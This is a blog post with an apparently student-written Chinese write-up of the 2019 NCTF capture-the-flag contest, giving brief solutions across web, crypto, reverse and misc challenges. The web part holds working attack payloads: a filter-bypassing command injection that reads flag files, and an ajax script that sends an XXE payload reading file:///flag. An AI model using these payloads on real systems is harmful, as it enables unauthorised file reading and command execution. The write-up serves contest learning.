<!DOCTYPE html>





<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico?v=7.4.1">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=7.4.1">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=7.4.1">
  <link rel="mask-icon" href="/images/favicon.ico?v=7.4.1" color="#222">
  <link rel="alternate" href="/atom.xml" title="Yiayaz's Blog" type="application/atom+xml">

<link rel="stylesheet" href="/css/main.css?v=7.4.1">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">
  <link rel="stylesheet" href="/lib/pace/pace-theme-loading-bar.min.css?v=1.0.2">
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.4.1',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":"flat"},
    back2top: {"enable":true,"sidebar":true,"scrollpercent":true},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="边打边学，真的学了不少东西，那就总结整理一下吧">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="2019_NCTF_WriteUp">
<meta property="og:url" content="https://yiayaz.top/posts/2019_NCTF_WriteUp/index.html">
<meta property="og:site_name" content="Yiayaz&#39;s Blog">
<meta property="og:description" content="边打边学，真的学了不少东西，那就总结整理一下吧">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-12-09T12:43:06.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019_NCTF_WriteUp">
<meta name="twitter:description" content="边打边学，真的学了不少东西，那就总结整理一下吧">
  <link rel="canonical" href="https://yiayaz.top/posts/2019_NCTF_WriteUp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>2019_NCTF_WriteUp | Yiayaz's Blog</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Yiayaz's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Welcome to my blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
        
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-about">
      
    

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-tags">
      
    

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-categories">
      
    

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
      
    
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger">
        
          <i class="fa fa-search fa-fw"></i>
        
        Search
        </a>
      </li>
    
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="Searching..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
            

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="https://yiayaz.top/posts/2019_NCTF_WriteUp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Yiayaz">
      <meta itemprop="description" content="A boaster and a liar are cousins-german.">
      <meta itemprop="image" content="/images/header2.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yiayaz's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            2019_NCTF_WriteUp
            

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              
                
              

              <time title="Created: 2019-12-09 20:25:00" itemprop="dateCreated datePublished" datetime="2019-12-09T20:25:00+08:00">2019-12-09</time>
            </span>
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
          
          <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
              
                <span class="post-meta-item-text">Symbols count in article: </span>
              
              <span>3.1k</span>
            </span>
          
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
              
                <span class="post-meta-item-text">Reading time &asymp;</span>
              
              <span>3 mins.</span>
            </span>
          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong><center>边打边学，真的学了不少东西，那就总结整理一下吧</center></strong></p>
<a id="more"></a>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="easyphp"><a href="#easyphp" class="headerlink" title="easyphp"></a>easyphp</h3><h4 id="solver-Yiayaz"><a href="#solver-Yiayaz" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>前两个很简单，第一天卡在第三个，第二天谷歌出来了</p>
<p>第一个：在23333后面加个%0a，</p>
<p><strong>23333%0a</strong></p>
<p>第二个：这个md5碰撞和之前的中科大的校赛有点像</p>
<p>它意思很明确，str1必须是数字，md5一开始不相同，str2把c换成0后要相同，python找一下</p>
<p><strong>str1=240610708&amp;str2=axN54</strong></p>
<p>第三个：不给_，那就q.w.q呀，开头不给ls，然后还不给超过8个，不给直接cat，那就c’a’t’空格f*，</p>
<p>转一下输入再按F12就行</p>
<p><strong>q.w.q=c%27a%27t%20f*</strong></p>
<p>不得不说这题让我学了好多东西，这题我爱了。</p>
<h3 id="flask"><a href="#flask" class="headerlink" title="flask"></a>flask</h3><h4 id="solver-Yiayaz-1"><a href="#solver-Yiayaz-1" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>查看源码后发现会检查是否包含flag，于是通配符or字符拼接</p>
<p><a href="https://www.cnblogs.com/leixiao-/p/10227867.html" target="_blank" rel="noopener"> Flask（Jinja2） 服务端模板注入漏洞(SSTI)</a></p>
<h3 id="Fake-XML-cookbook"><a href="#Fake-XML-cookbook" class="headerlink" title="Fake XML cookbook"></a>Fake XML cookbook</h3><h4 id="solver-0xfaner"><a href="#solver-0xfaner" class="headerlink" title="solver:0xfaner"></a>solver:0xfaner</h4><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> data = <span class="string">'&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;!DOCTYPE a [ &lt;!ENTITY file SYSTEM "file:///flag"&gt;]&gt;'</span> + <span class="string">"&lt;user&gt;&lt;username&gt;&amp;file;&lt;/username&gt;&lt;password&gt;ss&lt;/password&gt;&lt;/user&gt;"</span>;</span><br><span class="line">$.ajax(&#123;</span><br><span class="line">    type: <span class="string">"POST"</span>,</span><br><span class="line">    url: <span class="string">"doLogin.php"</span>,</span><br><span class="line">    contentType: <span class="string">"application/xml;charset=utf-8"</span>,</span><br><span class="line">    data: data,</span><br><span class="line">    dataType: <span class="string">"xml"</span>,</span><br><span class="line">    anysc: <span class="literal">false</span>,</span><br><span class="line">    success: <span class="function"><span class="keyword">function</span>(<span class="params">result</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> code = result.getElementsByTagName(<span class="string">"code"</span>)[<span class="number">0</span>].childNodes[<span class="number">0</span>].nodeValue;</span><br><span class="line">        <span class="keyword">var</span> msg = result.getElementsByTagName(<span class="string">"msg"</span>)[<span class="number">0</span>].childNodes[<span class="number">0</span>].nodeValue;</span><br><span class="line">        <span class="keyword">if</span> (code == <span class="string">"0"</span>) &#123;</span><br><span class="line">            $(<span class="string">".msg"</span>).text(msg + <span class="string">" login fail!"</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (code == <span class="string">"1"</span>) &#123;</span><br><span class="line">            $(<span class="string">".msg"</span>).text(msg + <span class="string">" login success!"</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            $(<span class="string">".msg"</span>).text(<span class="string">"error:"</span> + msg);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;,</span><br><span class="line">    error: <span class="function"><span class="keyword">function</span>(<span class="params">XMLHttpRequest, textStatus, errorThrown</span>) </span>&#123;</span><br><span class="line">        $(<span class="string">".msg"</span>).text(errorThrown + <span class="string">':'</span> + textStatus);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>分析网站源码，可以看出该网站可以XML注入，而且可以回显，那么直接利用现成的ajax代码改一下报文即可。</p>
<h2 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h2><h3 id="DEBUG"><a href="#DEBUG" class="headerlink" title="DEBUG"></a>DEBUG</h3><h4 id="solver-Yiayaz-2"><a href="#solver-Yiayaz-2" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>尝试在各个地方设置断点，虚拟机 <del>16.04丝般顺滑</del> 远程调试</p>
<h3 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h3><h4 id="solver-Yiayaz-3"><a href="#solver-Yiayaz-3" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>高斯消元acm板子啊</p>
<p>找到的那一大串本来是准备一个个手敲的，但是写了几个以后发现它每七个一循环，那就七个七个来呗</p>
<h2 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h2><h3 id="hello-pwn"><a href="#hello-pwn" class="headerlink" title="hello_pwn"></a>hello_pwn</h3><h4 id="solver-Yiayaz-4"><a href="#solver-Yiayaz-4" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>remote连上去</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="Keyboard"><a href="#Keyboard" class="headerlink" title="Keyboard"></a>Keyboard</h3><h4 id="solver-Yiayaz-5"><a href="#solver-Yiayaz-5" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>键盘上面字母对应的数字，然后拿出手机对着九键看出来</p>
<p>（实际上是谷歌了八个字母能干啥，然后就有说如果是连起来的是九键就试试惹，没想到。。。）</p>
<h3 id="Sore"><a href="#Sore" class="headerlink" title="Sore"></a>Sore</h3><h4 id="solver-Yiayaz-6"><a href="#solver-Yiayaz-6" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>Vigenere，丢进CAP，找出长度23，然后低频后解出密钥，直接交了一发密钥wa了，用CAP反解出Vigenre明文，明文大小写，修改密钥大小写。</p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="a-good-idea"><a href="#a-good-idea" class="headerlink" title="a_good_idea"></a>a_good_idea</h3><h4 id="solver-Yiayaz-7"><a href="#solver-Yiayaz-7" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>下载图片，改成rar，然后7zip打开，两张图（to.png，to_do.png），stegsolve开启，Image Combiner点击，找到二维码，扫就完事</p>
<h3 id="Become-a-Rockstar"><a href="#Become-a-Rockstar" class="headerlink" title="Become a Rockstar"></a>Become a Rockstar</h3><h4 id="solver-Yiayaz-8"><a href="#solver-Yiayaz-8" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>下载下来是一首优美的歌  <del>？心态炸裂</del>  ，然后看到<strong>NCTF{</strong>就很兴奋，文末还说不是程序，那就是文本阅读题呗</p>
<p>Say <strong>Problem Makers</strong></p>
<p>Put <strong>Problem Makers</strong> with <strong>Alice</strong> into Problem Makers with <strong>Bob</strong></p>
<p><strong>Alice</strong> says <strong>you</strong></p>
<p><strong>Bob</strong> says <strong>ar</strong></p>
<p>Shout <strong>RSA</strong></p>
<p>Put <strong>Ron Rivest</strong>  with <strong>Adi Shamir</strong> with <strong>Leonard Adleman</strong> into <strong>RSA</strong></p>
<p><strong>Ron Rivest</strong> says <strong>nice</strong></p>
<p><strong>Adi Shamir</strong> says <strong>rock</strong></p>
<p><strong>Leonard Adleman</strong> says <strong>star</strong></p>
<p>五个人says后面连起来很通顺，嗯，那肯定是惹（这脑洞真的）</p>
<h3 id="pip-install"><a href="#pip-install" class="headerlink" title="pip install"></a>pip install</h3><h4 id="solver-Yiayaz-9"><a href="#solver-Yiayaz-9" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>pip install —user nctf-2019-instal 后有个链接，点进去下载后找到setup.py这个文件，里面有个一看就觉得不大对劲的字符串，那我就不客气了，在线网站你懂的  <del>不是涩琪</del></p>
<h3 id="Bright-Body-I"><a href="#Bright-Body-I" class="headerlink" title="Bright Body I"></a>Bright Body I</h3><h4 id="solver-Yiayaz-10"><a href="#solver-Yiayaz-10" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>打开游戏先去左边拿装备，按u装备，然后瞎玩。一次性把蓝打空，就差不多把敌人打死，有时候会留一点血，然后黑魂玩家无敌（我超勇的）。先手在敌人仇恨范围外打就行，打完就有flag。</p>
<h3 id="2077"><a href="#2077" class="headerlink" title="2077"></a>2077</h3><h4 id="solver-Yiayaz-11"><a href="#solver-Yiayaz-11" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>点开发现是官方的视频（论梯子的重要性），所以不是中科大校赛那题的解法（？我寻思主办方没有2077的员工把）。那就社工题呗，google 一下stream code 2077，网站上写的很清楚他们从视频里找出了图片，然后下载图片，最后图片sha256就出来了。</p>
<h3 id="小狗的秘密"><a href="#小狗的秘密" class="headerlink" title="小狗的秘密"></a>小狗的秘密</h3><h4 id="solver-Yiayaz、0xfaner"><a href="#solver-Yiayaz、0xfaner" class="headerlink" title="solver:Yiayaz、0xfaner"></a>solver:Yiayaz、0xfaner</h4><p>先谷歌了一下什么是pcapng文件，然后下载大黑阔用的Wireshark，打开文件，去找奇奇怪怪的包，最后找到一个http的导出后，是1.html，打开看到三维点阵，谷歌一下就是发现是RGB，但是当时在外面，就直接丢给队友。</p>
<p>队友道：得到了像素信息使用PIL库写入像素点画图片即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># -*- coding:utf8 -</span></span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line">x = <span class="number">50</span>    <span class="comment">#x坐标  通过对txt里的行数进行整数分解</span></span><br><span class="line">y = <span class="number">2700</span>  <span class="comment">#y坐标  x*y=行数 13500行，150和900也可以</span></span><br><span class="line"><span class="comment"># 长宽改一下就行 100 50</span></span><br><span class="line">im = Image.new(<span class="string">"RGB"</span>, (x, y))</span><br><span class="line">file = open(<span class="string">'basic.txt'</span>)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, x):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>, y):</span><br><span class="line">        line = file.readline().replace(<span class="string">'('</span>,<span class="string">''</span>).replace(<span class="string">')'</span>,<span class="string">''</span>)  <span class="comment">#获取一行rgb值，并且把()都替换为空</span></span><br><span class="line">        rgb = line.split(<span class="string">","</span>) <span class="comment">#逗号分割</span></span><br><span class="line">        im.putpixel((i, j), (int(rgb[<span class="number">0</span>]), int(rgb[<span class="number">1</span>]), int(rgb[<span class="number">2</span>]))) <span class="comment">#（i,j）为坐标，后面的是像素点</span></span><br><span class="line"> </span><br><span class="line">im.save(<span class="string">"flag.png"</span>)</span><br></pre></td></tr></table></figure>
<p><a href="https://blog.csdn.net/qq_40657585/article/details/84858709" target="_blank" rel="noopener">原文链接</a></p>
<h2 id="Other"><a href="#Other" class="headerlink" title="Other"></a>Other</h2><h3 id="NCTF2019问卷调查"><a href="#NCTF2019问卷调查" class="headerlink" title="NCTF2019问卷调查"></a>NCTF2019问卷调查</h3><h4 id="solver-Yiayaz-12"><a href="#solver-Yiayaz-12" class="headerlink" title="solver:Yiayaz"></a>solver:Yiayaz</h4><p>这场比赛学到了很多东西，就是挺伤身体的，可能是因为我太菜了把，祝NCTF越办越好</p>

    </div>

    
    
    
        
      
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Yiayaz
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://yiayaz.top/posts/2019_NCTF_WriteUp/" title="2019_NCTF_WriteUp">https://yiayaz.top/posts/2019_NCTF_WriteUp/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>

      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/posts/Hello_Hexo/" rel="next" title="Hello Hexo">
                  <i class="fa fa-chevron-left"></i> Hello Hexo
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/posts/Qtxt/" rel="prev" title="Qtxt">
                  Qtxt <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#easyphp"><span class="nav-text">easyphp</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#flask"><span class="nav-text">flask</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-1"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Fake-XML-cookbook"><span class="nav-text">Fake XML cookbook</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-0xfaner"><span class="nav-text">solver:0xfaner</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Re"><span class="nav-text">Re</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DEBUG"><span class="nav-text">DEBUG</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-2"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#签到题"><span class="nav-text">签到题</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-3"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Pwn"><span class="nav-text">Pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#hello-pwn"><span class="nav-text">hello_pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-4"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Keyboard"><span class="nav-text">Keyboard</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-5"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Sore"><span class="nav-text">Sore</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-6"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Misc"><span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#a-good-idea"><span class="nav-text">a_good_idea</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-7"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Become-a-Rockstar"><span class="nav-text">Become a Rockstar</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-8"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pip-install"><span class="nav-text">pip install</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-9"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Bright-Body-I"><span class="nav-text">Bright Body I</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-10"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2077"><span class="nav-text">2077</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-11"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#小狗的秘密"><span class="nav-text">小狗的秘密</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz、0xfaner"><span class="nav-text">solver:Yiayaz、0xfaner</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Other"><span class="nav-text">Other</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#NCTF2019问卷调查"><span class="nav-text">NCTF2019问卷调查</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#solver-Yiayaz-12"><span class="nav-text">solver:Yiayaz</span></a></li></ol></li></ol></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image"
      src="/images/header2.jpg"
      alt="Yiayaz">
  <p class="site-author-name" itemprop="name">Yiayaz</p>
  <div class="site-description" itemprop="description">A boaster and a liar are cousins-german.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">categories</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">tags</span>
        </a>
      </div>
    
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="https://github.com/yiayaz" title="GitHub &rarr; https://github.com/yiayaz" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
    
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="mailto:yiayaz@qq.com" title="E-Mail &rarr; mailto:yiayaz@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
    
  </div>
  <div class="cc-license motion-element" itemprop="license">
    
  
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Friends
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://0xfaner.top" title="https://0xfaner.top" rel="noopener" target="_blank">0xfaner</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://www.johnzhang.xyz" title="https://www.johnzhang.xyz" rel="noopener" target="_blank">zsgsdesign</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="http://yuki.systems" title="http://yuki.systems" rel="noopener" target="_blank">Brethland</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://pikanglong.com" title="https://pikanglong.com" rel="noopener" target="_blank">Cone Pi</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://xgsteins.fun" title="https://xgsteins.fun" rel="noopener" target="_blank">Xgsteins</a>
        </li>
      
        <li class="links-of-blogroll-item">
